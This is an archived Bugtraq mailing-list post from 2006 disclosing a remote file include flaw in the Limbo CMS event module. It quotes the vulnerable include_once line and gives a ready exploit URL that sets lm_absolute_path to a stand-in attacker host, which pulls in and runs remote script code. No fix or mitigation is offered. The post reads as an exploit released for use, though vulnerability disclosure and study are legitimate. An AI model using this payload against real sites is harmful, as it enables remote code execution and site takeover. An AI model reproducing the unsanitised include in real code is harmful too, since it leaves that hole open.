bugtraq
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Limbo CMS event module (lm_absolute_path) Remote File Include Vulnerabil

from [xorontr] [Permanent Link][Original]
To: bugtraq@securityfocus.com
Subject: Limbo CMS event module (lm_absolute_path) Remote File Include Vulnerabilities
From: xorontr@gmail.com
Date: 28 Dec 2006 05:23:25 -0000
Delivered-to: sp-com-lists@consult.net
Delivered-to: bugtraq-list@securepoint.com
Delivered-to: mailing list bugtraq@securityfocus.com
Delivered-to: moderator for bugtraq@securityfocus.com
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@securityfocus.com; run by ezmlm 
-----------------------------------------------

Limbo CMS event module (lm_absolute_path) Remote File Include Vulnerabilities

-----------------------------------------------


Author: xoron

-----------------------------------------------
 
Vuln Code:

include_once($lm_absolute_path."components/com_event/lang/event.".$lm_language.".php");

-----------------------------------------------

3xplo!t:

http://www.[target].com/[script_path]/eventcal/mod_eventcal.php?lm_absolute_path=http://evil_scripts?


-----------------------------------------------

download:  http://www.limbo-tr.com/images/downloads/event.zip

-----------------------------------------------
XORON   -   XORON   -   XORON   -   XORON   -   XORON
-----------------------------------------------------------
-                                                         -
-                                                         -
- Tum muslumanlarin kurban bayrami simdiden mubarek olsun -
-                                                         -
-              Greetz: str0ke, Kacper                     -
-                                                         -
-----------------------------------------------------------

# milw0rm.com [2006-12-27]
[More with this subject...]
<Prev in Thread] Current Thread [Next in Thread>
  • Limbo CMS event module (lm_absolute_path) Remote File Include Vulnerabilities, xorontr <=
Previous by Date:  ShmooCon Announcement, B Potter
Next by Date:  [SECURITY] [DSA 1243-1] New evince packages fix arbitrary code execution, Moritz Muehlenhoff
Previous by Thread:  ShmooCon Announcement, B Potter
Next by Thread:  [SECURITY] [DSA 1243-1] New evince packages fix arbitrary code execution, Moritz Muehlenhoff
Indexes:  [Date] [Thread] [Top] [All Lists]